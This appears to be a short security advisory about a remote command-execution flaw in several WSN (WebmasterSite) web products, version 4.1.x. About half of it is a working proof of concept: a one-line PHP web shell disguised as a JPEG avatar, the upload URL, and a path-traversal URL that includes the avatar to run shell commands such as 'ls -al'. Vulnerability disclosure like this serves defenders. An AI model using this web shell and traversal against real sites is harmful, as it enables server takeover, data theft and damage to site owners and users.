25 lines
No EOL
881 B
Text
25 lines
No EOL
881 B
Text
source: http://www.securityfocus.com/bid/30572/info
|
|
|
|
Multiple WebmasterSite products are prone to a remote shell command-execution vulnerability because the applications fail to sufficiently sanitize user-supplied data.
|
|
|
|
Successfully exploiting this issue will allow an attacker to execute arbitrary commands in the context of the affected application.
|
|
|
|
This issue affects the following products:
|
|
|
|
WSN Forum 4.1.43
|
|
WSN Knowledge Base 4.1.36
|
|
WSN Links 4.1.44
|
|
WSN Gallery 4.1.30
|
|
|
|
Note that previous versions may also be vulnerable.
|
|
|
|
Avatar evil.jpg source:
|
|
<? system($_GET['cmd']); ?>
|
|
|
|
Enter to upload:
|
|
http://www.example.com/forum/profile.php?action=editprofile&id=[Your User ID]
|
|
|
|
See the avatar name at your profile.
|
|
|
|
Upload evil avatar and go to:
|
|
http://www.example.com/index.php?custom=yes&TID=../../attachments/avatars/[Avatar Name]&ext=jpg&cmd=ls -al |